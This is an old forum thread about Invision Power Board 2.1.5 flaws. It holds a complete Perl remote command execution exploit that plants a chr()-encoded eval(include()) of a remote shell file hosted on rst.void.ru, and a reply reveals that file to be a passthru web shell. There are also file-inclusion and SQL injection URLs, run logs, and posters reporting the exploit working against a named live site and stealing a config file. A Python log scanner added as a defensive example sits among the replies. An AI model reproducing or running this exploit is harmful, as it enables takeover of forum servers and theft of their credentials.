Vulnerability in Invision Power Board 2.1.5

Discussion in 'CMS/forum vulnerabilities' started by Go0o$E, 26 Apr 2006.

  1. Go0o$E (Members of Antichat)
    Software: Invision Power Board
    Vulnerable versions: 2.1.5 and possibly earlier versions
    Type: remote
    Severity: high
    Description:
    1. Arbitrary code execution is possible because of insufficient filtering of user-supplied data. A malicious user can craft a message body and then execute arbitrary code.
    2. Inclusion of arbitrary files is possible when administrator rights are held.
    Example:

    _http://host/admin.php?adsess=…&section=content&act=msubs&code=install-gateway&name=%08%08%08%08%08%08%08%08%08/../class_gw_test*

    3. SQL injection in the file sources/lib/func_taskmanager.php
    A malicious user can craft and execute an arbitrary database query (the query length must not exceed 32 characters).
    Example:

    _http://www.host.com/index.php?act=task&ck='

    Solution: no solution exists at present
    Source: spam_(at)_we11er.co.uk

    The SQL injection works; a pity about the 32-character limit =(
     
  2. Qwazar (Elder)
    Are there any details on item 1? Or is this all about the same well-known XSS?
     
  3. Otaku (Elder)
    I don't understand SQL all that well. Is there any use in this SQL injection? There is a limit, after all :(
     
  4. tmp (Banned)
  5. andre (New Member)
    ## Invision Power Board 2.* commands execution exploit by RST/GHC
    ## vulnerable versions <= 2.1.5
    ## tested on 2.1.4, 2.0.2

    Code:
    #!/usr/bin/perl
    
    ## Invision Power Board 2.* commands execution exploit by RST/GHC
    ## vulnerable versions <= 2.1.5
    ## tested on 2.1.4, 2.0.2
    ##
    ## (c)oded by 1dt.w0lf
    ## RST/GHC
    ## http://rst.void.ru
    ## http://ghc.ru
    
    
    use IO::Socket;
    use Getopt::Std;
    
    getopts("l:h:p:d:f:v:");
    
    $host     = $opt_h;
    $dir      = $opt_d;
    $login    = $opt_l;
    $password = $opt_p;
    $forum    = $opt_f;
    $version  = $opt_v || 0;
    
    $|++;
    
    header();
    if(!$host||!$dir||!$login||!$password||!$forum) { usage(); }
    
    print "[~]    SERVER : $host\r\n";
    print "[~]      PATH : $dir\r\n";
    print "[~]     LOGIN : $login\r\n";
    print "[~]  PASSWORD : $password\r\n";
    print "[~]    TARGET : $version";
    print (($version)?(' - IPB 2.1.*'):(' - IPB 2.0.*'));
    print "\r\n";
    
    print "[~] Login ... ";
    
    $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
    $login    =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
    $password =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
    $post     = 'UserName='.$login.'&PassWord='.$password;
    $loggedin = 0;
    print $sock "POST ${dir}index.php?act=Login&CODE=01 HTTP/1.1\r\n";
    print $sock "Host: $host\r\n";
    print $sock "Connection: close\r\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\n";
    print $sock "Content-length: ".length($post)."\r\n\r\n";
    print $sock "$post";
    print $sock "\r\n\r\n";
    while (<$sock>)
    {  
     if(/session_id=([a-f|0-9]{32})/) { $sid = $1; }
    }
    $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
    print $sock "GET ${dir}index.php HTTP/1.1\r\n";
    print $sock "Host: $host\r\n";
    print $sock "Cookie: session_id=$sid;\r\n";
    print $sock "Connection: close\r\n\r\n";
    while (<$sock>)
    {    
     if(/act=Login&amp;CODE=03/) { $loggedin = 1; last; }
    }
    if($loggedin) { print " [ DONE ]\r\n"; }
    else { print " [ FAILED ]\r\n"; exit(); }
    
    print "[+] SID: $sid\r\n";
    
    print "[~] Try get md5_check ...";
    $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
    if($version==1)
     {
     print $sock "GET ${dir}index.php?act=post&do=new_post&f=${forum} HTTP/1.1\r\n";
     }
    else
     {
     print $sock "GET ${dir}index.php?act=Post&CODE=00&f=${forum} HTTP/1.1\r\n";
     }
    print $sock "Host: $host\r\n";
    print $sock "Cookie: session_id=$sid;\r\n";
    print $sock "Connection: close\r\n\r\n";
    while (<$sock>)
     {  
     if($version == 1 && /ipb_md5_check\s*= \"([a-f|0-9]{32})\"/)  { $md5_check = $1; last; }
     if($version == 0 && /auth_key' value='([a-f|0-9]{32})/) { $md5_check = $1; last; }
     }
    close($sock);
    if($md5_check) { print " [ DONE ]\r\n"; print "[+] MD5_CHECK : $md5_check\r\n"; }
    else { print " [ FAILED ]\r\n"; exit(); }
    
    print "[~] Create new message ...";
    $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
    $created = 0;
    $text = 'r57ipbxplhohohoeval(include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(114).chr(115).chr(116).chr(46).chr(118).chr(111).chr(105).chr(100).chr(46).chr(114).chr(117).chr(47).chr(114).chr(53)'.
            '.chr(55).chr(105).chr(112).chr(98).chr(105).chr(110).chr(99).chr(46).chr(116).chr(120).chr(116))); //';
    $post = "st=0&act=Post&s=&f=${forum}&auth_key=${md5_check}&removeattachid=0&CODE=01&post_key=&TopicTitle=justxpl&TopicDesc=justxpl&poll_question=&ffont=0&fsize=0&Post=${text}&enableemo=yes&enablesig=yes&iconid=0";
    print $sock "POST ${dir}index.php HTTP/1.1\r\n";
    print $sock "Host: $host\r\n";
    print $sock "Cookie: session_id=$sid;\r\n";
    print $sock "Connection: close\r\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\n";
    print $sock "Content-length: ".length($post)."\r\n\r\n";
    print $sock "$post";
    print $sock "\r\n\r\n";
    while (<$sock>)
     {  
     if(/Location:/) { $created = 1; last; }
     }
    if($created) { print " [ DONE ]\r\n"; }
    else { print " [ FAILED ]\r\n"; exit(); }
    
    $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
    print "[~] Search message ...";
    $post = 'keywords=r57ipbxplhohohoeval&namesearch='.$login.'&forums%5B%5D=all&searchsubs=1&prune=0&prune_type=newer&sort_key=last_post&sort_order=desc&search_in=posts&result_type=posts';
    print $sock "POST ${dir}index.php?act=Search&CODE=01 HTTP/1.1\r\n";
    print $sock "Host: $host\r\n";
    print $sock "Cookie: session_id=$sid;\r\n";
    print $sock "Connection: close\r\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\n";
    print $sock "Content-length: ".length($post)."\r\n\r\n";
    print $sock "$post";
    print $sock "\r\n\r\n";
    
    while (<$sock>)
     {
     if(/searchid=([a-f|0-9]{32})/) { $searchid = $1; last; }
     }
    
    if($searchid) { print " [ DONE ]\r\n"; }
    else { print "[ FAILED ]\r\n"; exit(); }
    print "[+] SEARCHID: $searchid\r\n";
    
    $get = 'index.php?act=Search&CODE=show&searchid='.$searchid.'&search_in=posts&result_type=posts&highlite=r57ipbxplhohohoeval&lastdate=z|eval.*?%20//)%23e%00';
    
    while ()
     {
        print "Command for execute or 'exit' for exit # ";
        while(<STDIN>)
         {
            $cmd=$_;
            chomp($cmd);
            exit() if ($cmd eq 'exit');
            last;
         }
        &run($cmd);
     }
    
    sub run()
     {
      $cmd =~ s/(.*);$/$1/eg;
      $cmd =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
      $cmd2 = '%65%63%68%6F%20%5F%53%54%41%52%54%5F%20%26%26%20';
      $cmd2 .= $cmd;
      $cmd2 .= '%20%26%26%20%65%63%68%6F%20%5F%45%4E%44%5F';
      $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
      
      print $sock "GET ${dir}${get}&eharniy_ekibastos=$cmd2 HTTP/1.1\r\n";
      print $sock "Host: $host\r\n";
      print $sock "Cookie: session_id=$sid;\r\n";
      print $sock "Connection: close\r\n\r\n";
    
      $on = 0;
      $runned = 0;
      while ($answer = <$sock>)
       {
        if ($answer =~ /^_END_/) { return 0; }
        if ($on == 1) { print "  $answer"; }
        if ($answer =~ /^_START_/) { $on = 1; }
       }
     }
     
    sub header()
     {
     print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";   
     print " Invision Power Board 2.* commands execution exploit by RST/GHC\r\n";
     print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
     }
     
    sub usage()
     {
     print "r57ipbce.pl -h <host> -d <dir> -l <login> -p <password> -f <forum> -v <version>\r\n\r\n";
     print "<host>     - host where IPB installed e.g www.ipb.com\r\n";
     print "<dir>      - folder where IPB installed e.g. /forum/ , /ipb/ , etc...\r\n";
     print "<login>    - login of any exist user\r\n";
     print "<password> - and password too )\r\n";
     print "<forum>    - number of forum where user can create topic e.g 2,4, etc\r\n";
     print "<version>  - forum version:\r\n";
     print "             0 - 2.0.*\r\n";
     print "             1 - 2.1.*\r\n";
     exit();
     }
    
    tested on 2.1.5 - works
     
  6. EST a1ien (Elder)
    Rst/ghc have pleased us again with their exploits, and as always there's some kind of surprise in there :)
     
  7. jagga_man (New Member)
    yes, it's there 100% ) you need to dig through the code)
     
  8. 0verfe1 (New Member)
    everything's OK for me, almost; only when it's time to execute a command, I enter it and still get nothing =)), now I'll try it on other forums
    Code:
    [~]    TARGET : 0 - IPB 2.0.*
    [~] Login ...  [ DONE ]
    [+] SID: eba6aea1bb52b4e2b96e71496c1d019d
    [~] Try get md5_check ... [ DONE ]
    [+] MD5_CHECK : 37b1d4a901d9fa423421d1c3b04181c9
    [~] Create new message ... [ DONE ]
    [~] Search message ... [ DONE ]
    [+] SEARCHID: 57404f05bbfa5153ffd009ac0782d291
    Command for execute or 'exit' for exit # id
    Command for execute or 'exit' for exit # ls -la
    Command for execute or 'exit' for exit # uname -a
    Command for execute or 'exit' for exit # exit
    
    what could the problem be?

    and also, very often:
    Code:
    [~] Login ...  [ DONE ]
    [+] SID: 1cac47e9bc3eb086a6931ebb997d926b
    [~] Try get md5_check ... [ FAILED ]
     
    #8 0verfe1, 27 Apr 2006 (last edited 27 Apr 2006)
  9. AoD (Elder)
    On line 95 of the exploit there is a chr()-encoded link, _http://rst.void.ru/r57ipbinc.txt, with the following contents

    Code:
    <?
    /*
    r57ipbce exploit include file
    */
    passthru($_GET['eharniy_ekibastos']);
    ?>
    
     
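As an added defensive example (not code from this thread or from RST/GHC), the following Python scans constructed access-log lines and post bodies for the request shapes the posted exploit relies on: a search URL whose lastdate parameter carries a regex alternation, a `#e` flag and a NUL byte, the extra eharniy_ekibastos command parameter, the r57ipbxpl highlite marker, and a post body with chr()-built eval(include(...)). The log lines and the 32-character ids are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the request shapes and message body used by the
# exploit posted in this thread. Sample log lines below are constructed.
LASTDATE_RE = re.compile(r"\|.*\)#e\x00")           # decoded form of ...)%23e%00
CHR_EVAL_RE = re.compile(r"eval\s*\(\s*include\s*\(\s*chr\s*\(", re.I)
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/1\.[01]"')

def url_indicators(url):
    """Return indicator names triggered by one request URL (empty if clean)."""
    hits = []
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if qs.get("act", [""])[0].lower() == "search":
        if any(LASTDATE_RE.search(v) for v in qs.get("lastdate", [])):
            hits.append("lastdate_regex_e_modifier")     # closes the regex, adds /e
        if any("r57ipbxpl" in v for v in qs.get("highlite", [])):
            hits.append("highlite_exploit_marker")      # literal marker from the exploit
    if "eharniy_ekibastos" in qs:
        hits.append("command_parameter")                # parameter read by the include file
    return hits

def body_indicators(text):
    """Flag a post body that hides eval(include(...)) behind chr() calls."""
    return ["chr_encoded_eval_include"] if CHR_EVAL_RE.search(text) else []

def scan_log(lines):
    """Return [(line_number, hits)] for every access-log line with indicators."""
    found = []
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if m:
            hits = url_indicators(m.group(1))
            if hits:
                found.append((n, hits))
    return found

SAMPLE_LOG = [  # constructed samples; the 32-hex ids are placeholders
    '10.0.0.5 - - [27/Apr/2006:10:01:02 +0400] "GET /forum/index.php?act=Search&CODE=show&searchid=' + "a" * 32 + '&search_in=posts&result_type=posts&highlite=r57ipbxplhohohoeval&lastdate=z|eval.*?%20//)%23e%00&eharniy_ekibastos=%69%64 HTTP/1.1" 200 812',
    '10.0.0.7 - - [27/Apr/2006:10:02:10 +0400] "GET /forum/index.php?act=Search&CODE=show&searchid=' + "b" * 32 + '&search_in=posts&result_type=posts&highlite=firmware&lastdate=1146000000 HTTP/1.1" 200 9132',
    '10.0.0.5 - - [27/Apr/2006:10:03:44 +0400] "GET /forum/index.php?act=Login&CODE=03 HTTP/1.1" 200 412',
]

if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

Only the first sample line is reported; the second is an ordinary search with a numeric lastdate and is left alone.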
  10. Go0o$E (Members of Antichat)
    The exploit works very well indeed! Tested it on lineageii.ru.
     
  11. 0verfe1 (New Member)
    yes, it works great =))) just not on every forum
     
  12. Azazel (In charge of everything)
  13. Carle-On-Line (New Member)
    So I don't get it, is there an encoded part in the exploit or not!?
     
  14. limpompo (Newbie)
  15. Otaku (Elder)
    Hm... For me the exploit prints
    [~] Create new message ... [ FILED ]

    A new topic with the message appears on the forum. The message contains that very encoded string from line 95.
     
  16. byte57 (Elder)
    the encoded part is clear: follow the link, and in theory you have to paste the code from that text file into the exploit, but somehow it's not working out; has anyone managed it?
     
  17. degeneration x (Elder)
    on 2.1.x it doesn't always work. On 2.0.x everything is fine! Sent myself conf_global.php by e-mail =))
     
  18. Black_Death (New Member)
    #18 Black_Death, 28 Apr 2006 (last edited 28 Apr 2006)
  19. nec (Elder)
  20. злюка (Elder)